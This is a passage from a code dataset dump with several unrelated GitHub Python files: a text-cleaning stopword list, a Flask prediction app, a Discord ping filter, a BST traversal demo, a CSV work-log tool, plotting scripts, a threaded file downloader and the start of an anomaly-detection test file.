'although', 'always', 'am', 'among']\nstopwords += ['amongst', 'amoungst', 'amount', 'an', 'and', 'another']\nstopwords += ['any', 'anyhow', 'anyone', 'anything', 'anyway', 'anywhere']\nstopwords += ['are', 'around', 'as', 'at', 'back', 'be', 'became']\nstopwords += ['because', 'become', 'becomes', 'becoming', 'been']\nstopwords += ['before', 'beforehand', 'behind', 'being', 'below']\nstopwords += ['beside', 'besides', 'best', 'between', 'beyond', 'bill', 'both']\nstopwords += ['bottom', 'but', 'by', 'call', 'can', 'cannot', 'cant']\nstopwords += ['co', 'computer', 'con', 'could', 'couldnt', 'cry', 'de']\nstopwords += ['describe', 'detail', 'did', 'do', 'done', 'down', 'due']\nstopwords += ['during', 'each', 'eg', 'eight', 'either', 'eleven', 'else']\nstopwords += ['elsewhere', 'email','empty', 'enough', 'etc', 'even', 'ever']\nstopwords += ['every', 'everyone', 'everything', 'everywhere', 'except']\nstopwords += ['few', 'fifteen', 'fifty', 'fill', 'find', 'fire', 'first']\nstopwords += ['five', 'for', 'former', 'formerly', 'forty', 'found']\nstopwords += ['four', 'from', 'front', 'full', 'further', 'get', 'give']\nstopwords += ['go', 'had', 'has', 'hasnt', 'have', 'he', 'hello', 'hence', 'her']\nstopwords += ['here', 'hereafter', 'hereby', 'herein', 'hereupon', 'hers']\nstopwords += ['herself', 'him', 'himself', 'his', 'hope','how', 'however']\nstopwords += ['hundred', 'i', 'ie', 'if', 'in', 'inc', 'indeed']\nstopwords += ['interest', 'into', 'introduce', 'is', 'it', 'its', 'itself', 'keep']\nstopwords += ['last', 'latter', 'latterly', 'least', 'less', 'ltd', 'made']\nstopwords += ['many', 'may', 'me', 'meanwhile', 'might', 'mill', 'mine']\nstopwords += ['more', 'moreover', 'most', 'mostly', 'move', 'much']\nstopwords += ['must', 'my', 'myself', 'name', 'namely', 'neither', 'never']\nstopwords += ['nevertheless', 'next', 'nine', 'no', 'nobody', 'none']\nstopwords += ['noone', 'nor', 'not', 'nothing', 'now', 'nowhere', 'of']\nstopwords += ['off', 'often', 'on','once', 'one', 'only', 'onto', 'or', 'org']\nstopwords += ['other', 'others', 'otherwise', 'our', 'ours', 'ourselves']\nstopwords += ['out', 'over', 'own', 'part', 'per', 'perhaps', 'please']\nstopwords += ['put', 'rather', 're', 's', 'same', 'salesforce','see', 'seem', 'seemed']\nstopwords += ['seeming', 'seems', 'sent', 'serious', 'several', 'she', 'should']\nstopwords += ['show', 'side', 'since', 'sincere', 'six', 'sixty', 'so']\nstopwords += ['some', 'somehow', 'someone', 'something', 'sometime']\nstopwords += ['sometimes', 'somewhere', 'still', 'such', 'system', 'take']\nstopwords += ['ten', 'test','than', 'that', 'the', 'their', 'them', 'themselves']\nstopwords += ['then', 'thence', 'there', 'thereafter', 'thereby']\nstopwords += ['therefore', 'therein', 'thereupon', 'these', 'they']\nstopwords += ['thick', 'thin', 'third', 'this', 'those', 'though', 'three']\nstopwords += ['three', 'through', 'throughout', 'thru', 'thus', 'to']\nstopwords += ['together', 'too', 'top', 'toward', 'towards', 'twelve']\nstopwords += ['twenty', 'two', 'un', 'under', 'until', 'up', 'upon']\nstopwords += ['us', 'very', 'via', 'wanted','was', 'we', 'well', 'were', 'what']\nstopwords += ['whatever', 'when', 'whence', 'whenever', 'where']\nstopwords += ['whereafter', 'whereas', 'whereby', 'wherein', 'whereupon']\nstopwords += ['wherever', 'whether', 'which', 'while', 'whither', 'who']\nstopwords += ['whoever', 'whole', 'whom', 'whose', 'why', 'will', 'with']\nstopwords += ['within', 'without', 'would', 'yet', 'you', 'your']\nstopwords += ['yours', 'yourself', 'yourselves']\n\n\ncategories = []\ncategories.extend(Category.security + Category.cash + Category.alternate)\n\n\ndef wordListToFreqDict(wordlist):\n wordfreq = [wordlist.count(p) for p in wordlist]\n wordcatg = [wordLabel(p) for p in wordlist]\n zip_catg_freq = zip(wordcatg, wordfreq)\n zip_keyword_catg_freq = zip(wordlist, zip_catg_freq)\n return dict(zip_keyword_catg_freq)\n\ndef wordFreq(elem):\n return elem[0][1]\n\ndef sortFreqDict(freqdict):\n aux = [(freqdict[key], key) for key in freqdict]\n sortedlist = sorted(aux, key = wordFreq, reverse = True)\n return sortedlist\n\ndef stripNonAlphaNum(text):\n import re\n return re.compile(r'\\W+', re.UNICODE).split(text)\n\ndef removeStopwords(wordlist, stopwords):\n return [w for w in wordlist if w not in stopwords] \n\ndef keyCategory(key): \n label = \"\"\n if Category.alternate.count(key) > 0:\n label = \"alternate\"\n elif Category.cash.count(key) > 0:\n label = \"cash\"\n elif Category.security.count(key) > 0:\n label = \"security\"\n else:\n label = \"uncategorized\"\n return label \n\ndef keywordCategory(freqdict):\n for key in freqdict:\n label = wordLabel(key[1]) \n\ndef remove_punctuation(text):\n punctuation2 = '-&'+'®©™€â´‚³©¥ã¼•ž®è±äüöž!@#“§$%^*()î_+€$=¿{”}[]:«;\"»\\â¢|<>,.?/~`0123456789'\n for sign in punctuation2:\n text = text.replace(sign, \" \")\n return text\n\ndef findWords(text):\n words = re.findall('\\w+', text)\n yield from words \n","repo_name":"udianand/CreditSuisseDemo","sub_path":"src/model/CleanText.py","file_name":"CleanText.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16810346826","text":"from flask import Flask, render_template, request #importing the necessary libraries \nimport pickle\nimport numpy as np\napp = Flask(__name__)\n\n\n@app.route('/', methods = [\"GET\", \"POST\"])# this code block is to show the user html page to enter the details to be predicted and the clicking the submit button\ndef hello():\n print(\"Request for index page received as it is\")\n return render_template('index2.html')\n\n@app.route('/predict', methods = ['POST']) #This code block is when the user clicked the submit button details from html page will be received using \"request.form\" and predictio\n #will be done based on the array\ndef prediction():\n if request.method == 'POST':\n product = request.form['product']\n fro = request.form['fro']\n to = request.form['to']\n quantity = request.form['quantity']\n permt = request.form['permt']\n commo = request.form['commo']\n\n data = [[product, fro, to, float(quantity), permt, commo]]\n model = pickle.load(open('revenue.pkl', 'rb'))\n\n prediction = np.array(model.predict(data)[0])\n\n return render_template('result.html', n = prediction)# result will be posted on the prediction page\n\n\nif __name__ == '__main__': #main execution code\n app.run()","repo_name":"santoshreddie/Trucknetics","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73816582906","text":"import re\n\nfrom bot.constants import Guild\nfrom bot.exts.filtering._filter_context import Event, FilterContext\nfrom bot.exts.filtering._filters.filter import UniqueFilter\n\nEVERYONE_PING_RE = re.compile(rf\"@everyone|<@&{Guild.id}>|@here\")\nCODE_BLOCK_RE = re.compile(\n r\"(?P``?)[^`]+?(?P=delim)(?!`+)\" # Inline codeblock\n r\"|```(.+?)```\", # Multiline codeblock\n re.DOTALL | re.MULTILINE\n)\n\n\nclass EveryoneFilter(UniqueFilter):\n \"\"\"Filter messages which contain `@everyone` and `@here` tags outside a codeblock.\"\"\"\n\n name = \"everyone\"\n events = (Event.MESSAGE, Event.MESSAGE_EDIT, Event.SNEKBOX)\n\n async def triggered_on(self, ctx: FilterContext) -> bool:\n \"\"\"Search for the filter's content within a given context.\"\"\"\n # First pass to avoid running re.sub on every message\n if not EVERYONE_PING_RE.search(ctx.content):\n return False\n\n content_without_codeblocks = CODE_BLOCK_RE.sub(\"\", ctx.content)\n return bool(EVERYONE_PING_RE.search(content_without_codeblocks))\n","repo_name":"python-discord/bot","sub_path":"bot/exts/filtering/_filters/unique/everyone.py","file_name":"everyone.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":1206,"dataset":"github-code","pt":"6"} +{"seq_id":"19575244432","text":"class BST:\n def __init__(self,val):\n self.k=val\n self.left = None\n self.right = None\n\nclass Traversal:\n \n def inorder(self,root):\n if root!=None:\n self.inorder(root.left)\n print(root.k,end=' ')\n self.inorder(root.right)\n\n def postorder(self,root):\n if root!=None:\n self.postorder(root.left)\n self.postorder(root.right)\n print(root.k,end=' ')\n\n def preorder(self,root):\n if root!=None:\n print(root.k,end=' ')\n self.preorder(root.left)\n self.preorder(root.right)\n \n def levelOrder(self,root):\n from collections import deque\n q=deque()\n q.append(root)\n\n while len(q)!=0:\n curr=q.popleft()\n print(curr.k,end=' ')\n if curr.left!=None:\n q.append(curr.left)\n if curr.right!=None:\n q.append(curr.right)\n \n\n# 50\n# / \\\n# / \\\n# 40 60\n# / \\ / \\\n# 10 48 59 70\n\nroot = BST(50)\n'<------LEFT SUB-TREE------->'\nroot.left = BST(40)\nroot.left.left = BST(10)\nroot.left.right = BST(48)\n\n'<------RIGHT SUB-TREE------->'\nroot.right = BST(60)\nroot.right.left = BST(59)\nroot.right.right = BST(70)\nif __name__=='__main__':\n tree=Traversal()\n tree.preorder(root)","repo_name":"iamtusharmukharji/Py_Data_Structrures","sub_path":"BST/BST.py","file_name":"BST.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16264489269","text":"\"\"\"\nA terminal application for logging what work someone did on a certain day.\nThe data is collected in a CSV document\nAuthor: Zachary Collins\nDate: July, 2018\n\"\"\"\nimport csv\n\nimport os\n\nimport re\n\nimport sys\n\n\n# Creates the csv file if it doesn't exist already\ntry:\n file = open(\"log.csv\", \"r\")\nexcept IOError:\n with open(\"log.csv\", \"w\") as csvfile:\n fieldnames = ['date', 'title', 'time spent', 'notes']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n\n\ndef clear_screen():\n \"\"\"Clears the contents of the console\"\"\"\n\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\ndef menu():\n \"\"\"Provides a menu on how to operate the program\"\"\"\n\n clear_screen()\n print(\"WORK LOG\")\n print(\"What would you like to do?\")\n print(\"a) Add new entry\")\n print(\"b) Search in existing entries\")\n print(\"c) Quit the program\")\n\n\ndef run():\n \"\"\"Runs the core function of the program\"\"\"\n\n menu()\n answer = input().lower()\n\n # Controls menu choice\n if answer == 'a':\n add_entry()\n elif answer == 'b':\n search()\n elif answer == 'c':\n exit()\n\n\ndef add_entry():\n \"\"\"Adds the entry to the CVS document\"\"\"\n\n clear_screen()\n\n # Adds a valid Date\n date = input(\"Enter the Date \\nPlease use MM/DD/YYYY: \")\n date = \"\".join(re.findall(r'(\\d{2}/\\d{2}/\\d{4})', date))\n if len(date) == 0:\n print(\"Must enter valid date\")\n input(\"Press ENTER to try again\")\n add_entry()\n\n # Adds a valid title\n title = input(\"Enter the Title: \")\n if len(title) == 0:\n print(\"Must enter a Title\")\n input(\"Press ENTER to try again\")\n add_entry()\n\n # Adds a valid amount of time\n try:\n time_spent = int(input(\"Enter the time spent (minutes): \"))\n except ValueError:\n print(\"time spent must be a number\")\n input(\"Press ENTER to try again\")\n add_entry()\n\n # Adds optional notes\n notes = input(\"Enter any additional notes (Optional): \")\n\n with open(\"log.csv\", \"a\") as csvfile:\n fieldnames = ['date', 'title', 'time spent', 'notes']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writerow({\n 'date': date,\n 'title': title,\n 'time spent': time_spent,\n 'notes': notes,\n })\n\n input(\"\\nEntry has been added. Press a key to return to menu. \")\n run()\n\n\ndef prompt():\n \"\"\"Provides a menu on searching functions\"\"\"\n\n clear_screen()\n print(\"Search Options:\")\n print(\"a) Find by Date\")\n print(\"b) Find by Time Spent\")\n print(\"c) Find by Exact Search\")\n print(\"d) Find by Regex Pattern\")\n\n\ndef search():\n \"\"\"Controls the logic of how the user will seach entries\"\"\"\n\n prompt()\n answer = input().lower()\n\n if answer == 'a':\n find_date()\n elif answer == 'b':\n find_time()\n elif answer == 'c':\n find_exact()\n elif answer == 'd':\n find_regex()\n\n\ndef find_date():\n \"\"\"Prompts the user to enter a valid date,\n allowing the user to choose an entry to view\"\"\"\n\n clear_screen()\n log = []\n dates = []\n\n # Opens CSV and reads the full rows and dates\n with open('log.csv', newline='') as csvfile:\n line_reader = csv.reader(csvfile, delimiter='|')\n rows = list(line_reader)\n fields = str(rows[0])\n for row in rows[1:]:\n log.append(', '.join(row))\n for element in row:\n index = element.find(',')\n dates.append(element[0:index])\n\n # Prints the valid options and lets the user search\n print(\"The following are valid dates: \")\n for date in dates:\n print(date)\n search = input(\"\\nEnter the Date (Must be valid)\\nUse MM/DD/YYYY: \")\n counter = 0\n if search in dates:\n for row in log:\n if search in row:\n break\n counter += 1\n else:\n find_date()\n\n # Provides a list for the user to search through\n answer = 'n'\n while answer != 'v':\n clear_screen()\n print(\"Hit 'n' for next date \\nHit 'v' to view the entries\")\n print(\"\\n\" + dates[counter])\n answer = input()\n if answer == 'n':\n counter += 1\n if counter == len(dates):\n counter = 0\n clear_screen()\n print(\"Here are the entries of that date:\")\n print(fields + \"\\n\")\n count = 1\n for row in log:\n if dates[counter] in row:\n print(\"Entry {}: {}\\n\".format(count, row))\n count += 1\n input(\"Press a key to return to menu: \")\n run()\n\n\ndef find_time():\n \"\"\"Prompts the user to enter a valid time,\n allowing the user to choose an entry to view\"\"\"\n\n clear_screen()\n log = []\n times = []\n\n # Opens CSV and reads the full rows and times\n with open('log.csv', newline='') as csvfile:\n line_reader = csv.reader(csvfile, delimiter='|')\n rows = list(line_reader)\n fields = str(rows[0])\n for row in rows[1:]:\n log.append(', '.join(row))\n for element in row:\n comma1 = element.find(',')\n comma2 = element.find(',', comma1 + 1)\n comma3 = element.find(',', comma2 + 1)\n times.append(element[comma2+1:comma3])\n\n # Prints the valid options and lets the user search\n print(\"The following are valid times: \")\n for time in times:\n print(time + \" minutes\")\n search = input(\"\\nEnter the desired Time (Must be valid, Number only): \")\n counter = 0\n found = False\n for row in log:\n comma1 = row.find(',')\n comma2 = row.find(',', comma1 + 1)\n comma3 = row.find(',', comma2 + 1)\n if search in row[comma2+1:comma3]:\n found = True\n break\n counter += 1\n if not found:\n find_time()\n\n # Provides a list for the user to search through\n answer = 'n'\n while answer != 'v':\n clear_screen()\n print(\"Hit 'n' for next amount of time\\nHit 'v' to view the entries\")\n print(\"\\n\" + times[counter] + \" minutes\")\n answer = input()\n if answer == 'n':\n counter += 1\n if counter == len(times):\n counter = 0\n clear_screen()\n print(\"Here are the entries of that time\")\n print(fields + \"\\n\")\n count = 1\n for row in log:\n comma1 = row.find(',')\n comma2 = row.find(',', comma1 + 1)\n comma3 = row.find(',', comma2 + 1)\n if times[counter] in row[comma2+1:comma3]:\n print(\"Entry {}: {}\\n\".format(count, row))\n count += 1\n input(\"Press a key to return to menu: \")\n run()\n\n\ndef find_exact():\n \"\"\"Prompts the user to enter a string to search for,\n providing all entries containing the string\"\"\"\n\n clear_screen()\n log = []\n title_notes = []\n\n # Opens CSV and reads the full rows and times\n with open('log.csv', newline='') as csvfile:\n line_reader = csv.reader(csvfile, delimiter='|')\n rows = list(line_reader)\n fields = str(rows[0])\n for row in rows[1:]:\n log.append(', '.join(row))\n for element in row:\n comma1 = element.find(',')\n comma2 = element.find(',', comma1 + 1)\n comma3 = element.find(',', comma2 + 1)\n title_notes.append(element[comma1+1:comma2] + \" \" +\n element[comma3+1:])\n\n # Prints the valid options and lets the user search\n print(\"The following are valid title/notes: \")\n for entry in title_notes:\n print(entry)\n search = input(\"\\nEnter the string to search for (Must be valid): \")\n if len(search) == 0:\n print(\"Please enter a search string\")\n input(\"Press ENTER to try again\")\n find_exact()\n\n # Provides a list of entries containing the search\n found = []\n count = 0\n for row in title_notes:\n if search in row:\n found.append(count)\n count += 1\n if len(found) == 0:\n answer = input(\"Error: string not in entries\\npress 'ENTER'\")\n find_exact()\n clear_screen()\n print(fields + \"\\n\")\n counter = 1\n for entry in found:\n print(\"Entry {}: {}\\n\".format(counter, log[entry]))\n counter += 1\n input(\"Press a key to return to menu: \")\n run()\n\n\ndef find_regex():\n \"\"\"Prompts the user to enter a Regex to search for,\n provides the entries with that regex\"\"\"\n\n clear_screen()\n log = []\n title_notes = []\n\n # Opens CSV and reads the full rows and times\n with open('log.csv', newline='') as csvfile:\n line_reader = csv.reader(csvfile, delimiter='|')\n rows = list(line_reader)\n fields = str(rows[0])\n for row in rows[1:]:\n log.append(', '.join(row))\n for element in row:\n comma1 = element.find(',')\n comma2 = element.find(',', comma1 + 1)\n comma3 = element.find(',', comma2 + 1)\n title_notes.append(element[comma1+1:comma2] + \" \" +\n element[comma3+1:])\n\n # Lets the user search regex\n regex = input(\"Enter the desired Regular Expression to search for: \")\n count = 0\n found = []\n for row in title_notes:\n line = re.findall(r'{}'.format(regex), row)\n if len(line):\n found.append(count)\n count += 1\n counter = 1\n clear_screen()\n\n # Provides a list of entries containing the Regex\n print(fields + \"\\n\")\n for entry in found:\n print(\"Entry {}: {}\".format(counter, log[entry]))\n print(\"Regex Phrase: {}\".format(\"\".join(re.findall(r'{}'.format(regex),\n log[entry]))))\n counter += 1\n if len(found) == 0:\n print(\"No enties were found with that Regular Expression\")\n input(\"\\nPress a key to return to menu: \")\n run()\n\n\n# Ensures this only runs upon the main method being called.\nif __name__ == \"__main__\":\n run()\n\n","repo_name":"zcollin/TechDegree_Project3","sub_path":"TechDegree Project3/work_log.py","file_name":"work_log.py","file_ext":"py","file_size_in_byte":9985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28997020605","text":"import matplotlib.pyplot as plt\nimport matplotlib as mpl\nmpl.rc('font', family='Times New Roman')\n# mpl.rc('text', color='black')\n\nimport numpy as np\nfrom collections import defaultdict as dd\nfrom utils.data import dump, load\nfrom matplotlib import rcParams\nrcParams.update({'figure.autolayout': True})\n\n\ndef get_data():\n dataset = \"sutter\"\n level = 2\n import os\n results = dd(list)\n xs = {}\n for file in os.listdir(\"/home/yzhang3151/project/AutoPrescribe2/data\"):\n if file.endswith(\".pkl\") and file.startswith(\"%s_%s\" % (dataset, level)):\n d = file.split(\"_\")\n results[d[2]].append((int(d[5][1:]), int(d[6][1:]), float(d[7].replace(\"jacc\", \"\"))))\n\n for k in results:\n xs[k] = [y[2] for y in sorted(results[k], key=lambda x: (x[0], x[1]))]\n\n dump(xs, \"traj_%s_%s.pkl\" % (dataset, level))\n\n xs = load(\"traj_%s_%s.pkl\" % (dataset, level))\n\n name_mapping = {\n \"voc\": \"Vocabulary\",\n \"random\": \"Random\",\n \"freq\": \"Frequent first\",\n \"rare\": \"Rare first\"\n }\n line_type = {\n \"random\": \"-\",\n \"freq\": \"--\",\n \"rare\": \"s\",\n \"voc\": \"^\"\n }\n\n\n fig, ax = plt.subplots(figsize=(8, 4))\n\n for k in name_mapping:\n line, = ax.plot([x for x in xs[k]][:len(xs[\"random\"])], line_type[k], linewidth=2, label=name_mapping[k])\n\n # x = np.linspace(0, 10, 500)\n # dashes = [10, 5, 100, 5] # 10 points on, 5 off, 100 on, 5 off\n #\n # line1, = ax.plot(x, np.sin(x), '--', linewidth=2,\n # label='Dashes set retroactively')\n # line1.set_dashes(dashes)\n #\n # line2, = ax.plot(x, -1 * np.sin(x), dashes=[30, 5, 10, 5],\n # label='Dashes set proactively')\n ax.set_xlabel(\"Epochs\", fontsize=20)\n ax.set_ylabel(\"Jaccard Coefficient\", fontsize=20)\n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(15)\n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(15)\n ax.legend(loc='lower right', fontsize=20)\n # plt.show()\n fig.tight_layout()\n plt.savefig(\"traj_%s_%s.pdf\" % (dataset, level))\n\n\ndef plot_rf(f_name):\n dataset = \"sutter\"\n level = 2\n f_name = \"reinforce_reward_%s_%s_random_per_1.txt\" % (dataset, level)\n results = []\n for i, line in enumerate(open(f_name)):\n if i % 20 == 0:\n x = line.strip().split()\n # if x[1] == '0':\n results.append(float(x[2]))\n\n fig, ax = plt.subplots(figsize=(4, 3))\n ax.set_xlabel(\"Epochs\", fontsize=20)\n ax.set_ylabel(\"Average Reward\", fontsize=20)\n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(15)\n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(15)\n\n line, = ax.plot(results, '-', linewidth=2)\n\n\n # ax.legend(loc='lower right', fontsize=20)\n # plt.show()\n fig.tight_layout()\n plt.savefig(\"rf_traj_%s_%s.pdf\" % (dataset, level))\n\ndef plot_rf_mimic():\n dataset = \"mimic\"\n level = 2\n f_name = \"reinforce_reward_%s_%s_per_1.txt\" % (dataset, level)\n results = []\n for i, line in enumerate(open(f_name)):\n if i % 20 == 0:\n x = line.strip().split()\n # if x[1] == '0':\n results.append(float(x[2]))\n\n fig, ax = plt.subplots(figsize=(4, 3))\n ax.set_xlabel(\"Epochs\", fontsize=20)\n ax.set_ylabel(\"Average Reward\", fontsize=20)\n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(15)\n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(15)\n\n line, = ax.plot(results, '-', linewidth=2)\n\n\n # ax.legend(loc='lower right', fontsize=20)\n # plt.show()\n fig.tight_layout()\n plt.savefig(\"rf_traj_%s_%s.pdf\" % (dataset, level))\n\ndef plot_bar():\n x = [1.15, 0.74, 0.48, 0.49, 0.63]\n labels = [\"LEAP\", \"Basic LEAP\", \"Classifier Chains\", \"Softmax MLP\", 'K-Most frequent']\n fig, ax = plt.subplots(figsize=(4, 2.5))\n ax.set_ylabel(\"Average Score\", fontsize=20)\n ax.set_ylim(0, 1.6)\n for j in range(len(x)):\n ax.bar(j, x[j], width=0.5, bottom=0.0, align='center', alpha=0.6, label=labels[j])\n ax.xaxis.set_ticklabels([])\n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(15)\n ax.legend()\n plt.savefig(\"subjective.pdf\")\n","repo_name":"neozhangthe1/AutoPrescribe","sub_path":"utils/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"6"} +{"seq_id":"5423291735","text":"'''\n@author:KongWeiKun\n@file: another.py\n@time: 18-3-24 下午3:45\n@contact: 836242657@qq.com\n'''\nimport sys\nimport requests\nimport threading\nimport datetime\n\n# 传入的命令行参数,要下载文件的url\nurl = 'http://archive.ics.uci.edu/ml/machine-learning-databases/00203/YearPredictionMSD.txt.zip'\n\n\ndef Handler(start, end, url, filename):\n headers = {'Range': 'bytes=%d-%d' % (start, end)}\n r = requests.get(url, headers=headers, stream=True)\n print(\"本次写入的大小为%.3f\"%float(int(r.headers['content-length'])/1024/1024))\n # 写入文件对应位置\n with open(filename, \"r+b\") as fp:\n fp.seek(start)\n var = fp.tell()\n for data in r.iter_content(chunk_size=1024):\n fp.write(data)\n\n\n\ndef download_file(url, num_thread=10):\n r = requests.head(url)\n try:\n file_name = url.split('/')[-1]\n file_size = int(\n r.headers['content-length']) # Content-Length获得文件主体的大小,当http服务器使用Connection:keep-alive时,不支持Content-Length\n except:\n print(\"检查URL,或不支持对线程下载\")\n return\n sys.stdout.write(' %s 文件大小为 :%0.2f MB\\n' % (file_name, file_size / 1024 / 1024))\n # 创建一个和要下载文件一样大小的文件\n fp = open(file_name, \"wb\")\n #创建文件\n fp.truncate(file_size)\n fp.close()\n\n # 启动多线程写文件\n print(\"创建多线程写入文件\")\n part = file_size // num_thread # 如果不能整除,最后一块应该多几个字节\n print(\"共分为{}part\".format(part))\n for i in range(num_thread):\n start = part * i\n if i == num_thread - 1: # 最后一块\n end = file_size\n else:\n end = start + part\n print(\"开始为{}结束为{}\".format(start,end))\n t = threading.Thread(target=Handler, kwargs={'start': start, 'end': end, 'url': url, 'filename': file_name})\n t.setDaemon(True)\n t.start()\n\n # 等待所有线程下载完成\n main_thread = threading.current_thread()\n for t in threading.enumerate():\n if t is main_thread:\n continue\n t.join()\n print('%s 下载完成' % file_name)\n\n\nif __name__ == '__main__':\n start = datetime.datetime.now().replace(microsecond=0)\n download_file(url)\n end = datetime.datetime.now().replace(microsecond=0)\n print(\"用时: \", end='')\n print(end - start)","repo_name":"Winniekun/spider","sub_path":"downloader/file_downloader.py","file_name":"file_downloader.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"6"} +{"seq_id":"37129737959","text":"data_types = {\n 0xFD: 'Light',\n 0xFE: 'Temperature',\n 0xF9: 'Status',\n 0xF6: 'Ultrasoon'\n}\n\n\nclass DataReader:\n @staticmethod\n def decode_and_return_data(data):\n current_data_type = None\n sequence_start_index = 0\n sequence_started = False\n\n temp_data = {}\n\n for i in range(len(data)):\n if data[i] in data_types.keys() and not sequence_started:\n current_data_type = data[i]\n sequence_start_index = i + 1\n sequence_started = True\n\n if sequence_started:\n if data[i] is 0x0A and data[i - 1] is current_data_type and data[i - 2] is 0x00:\n sequence_started = False\n sequence_stop_index = i - 2\n\n if current_data_type in temp_data.keys():\n temp_data[current_data_type].extend(data[sequence_start_index:sequence_stop_index])\n else:\n temp_data[current_data_type] = data[sequence_start_index:sequence_stop_index]\n\n current_data_type = None\n\n return temp_data\n","repo_name":"Bloomdex/2.1-embedded-systems","sub_path":"Basestation/serialcontrol/datareader.py","file_name":"datareader.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"45364269166","text":"from Game.Shared import *\r\n\r\nclass Pad(GameObject):\r\n\r\n def __init__(self , position , sprite):\r\n super(Pad, self).__init__(position, GameConstant.PAD_SIZE, sprite)\r\n\r\n def setPosition(self , position):\r\n newPosition = [position[0] , position[1]]\r\n size = self.getSize()\r\n\r\n if newPosition[0] + size[0] >= GameConstant.SCREEN_SIZE[0]:\r\n newPosition[0] = GameConstant.SCREEN_SIZE[0] - size[0]\r\n\r\n super(Pad, self).setPosition(newPosition)\r\n","repo_name":"grapeJUICE1/Grape-Bricks","sub_path":"Game/Pad.py","file_name":"Pad.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"5516586203","text":"import os\nimport fnmatch\nimport shutil\n\n\ndef is_file_match(filename, patterns):\n for pattern in patterns:\n print(pattern)\n if fnmatch.fnmatch(filename, pattern):\n return True\n return False\n\n\ndef find_special_files(root, patterns=['*'], exclude_dirs=[], exclude_patterns=[], exclude_files=['.DS_Store', 'Thumbs.db']):\n for root, dirnames, filenames in os.walk(root):\n for filename in filenames:\n print(filename)\n if filename not in exclude_files:\n if is_file_match(filename, patterns):\n if is_file_match(filename, exclude_patterns) == False:\n yield os.path.join(root, filename)\n for d in exclude_dirs:\n if d in dirnames:\n dirnames.remove(d)\n\n\nif __name__ == '__main__':\n # old_path = input(\"文件所在的路径:\")\n # root_path = r\"C:\\Output\"\n root_path = r\"{}\".format(input(\"视频旋转后的路径: \"))\n root_new_path = r\"{}\".format(input(\"被替换的视频的路径: \"))\n # root_new_path = r\"\\\\dtc-fs\\SmartCar\\DMS_Test\\Face_Video_Test_Set\\1_raw_data\\0526\\A1\\003\"\n txt_list = list(find_special_files(root_path, patterns=['*.avi'], exclude_dirs=[], exclude_patterns=[],exclude_files=['.DS_Store', 'Thumbs.db', '*_keyframe.txt']))\n txt_list_new_path = list(find_special_files(root_new_path, patterns=['*.avi'], exclude_dirs=[], exclude_patterns=[],\n exclude_files=['.DS_Store', 'Thumbs.db', '*_keyframe.txt']))\n\n for item_path in txt_list_new_path:\n print(\"item_path\", item_path)\n item_new_path = os.path.basename(os.path.splitext(item_path)[0])\n print(\"item_new_path\", item_new_path)\n for item in txt_list:\n print('item', item)\n item_root = os.path.basename(os.path.splitext(item)[0])\n print(\"item_root\", item_root)\n if item_root.find(item_new_path, 0, len(item_root)-1) == 0:\n shutil.move(item, item_path)\n print(\"移动结束\")\n\n\n","repo_name":"2372254825/tool_clip","sub_path":"clip/move_file.py","file_name":"move_file.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30329958577","text":"\"Check if the series name or column name is correctly kept.\"\n\nimport sys\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nfrom sklearn.cluster import KMeans\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.neighbors import LocalOutlierFactor\n\nimport adtk.detector as detector\nimport adtk.transformer as transformer\nfrom adtk._base import _TrainableModel\nfrom adtk._detector_base import ( # _NonTrainableMultivariateDetector,\n _NonTrainableUnivariateDetector,\n _TrainableMultivariateDetector,\n _TrainableUnivariateDetector,\n)\n\n_Detector = (\n _NonTrainableUnivariateDetector,\n # _NonTrainableMultivariateDetector,\n _TrainableUnivariateDetector,\n _TrainableMultivariateDetector,\n)\n\n# We have 4 types of models\n# - one-to-one: input a univariate series, output a univariate series\n# - one-to-many: input a univariate series, output a multivariate series\n# - many-to-one: input a multivariate series, output a univariate series\n# - many-to-many: input a multivariate series, output a multivariate series\n\none2one_models = [\n detector.ThresholdAD(),\n detector.QuantileAD(),\n detector.InterQuartileRangeAD(),\n detector.GeneralizedESDTestAD(),\n detector.PersistAD(window=10),\n detector.LevelShiftAD(window=10),\n detector.VolatilityShiftAD(window=10),\n detector.AutoregressionAD(),\n detector.SeasonalAD(freq=2),\n transformer.RollingAggregate(window=10, agg=\"median\"),\n transformer.RollingAggregate(\n window=10, agg=\"quantile\", agg_params={\"q\": 0.5}\n ),\n transformer.DoubleRollingAggregate(window=10, agg=\"median\"),\n transformer.DoubleRollingAggregate(\n window=10, agg=\"quantile\", agg_params={\"q\": [0.1, 0.5, 0.9]}\n ),\n 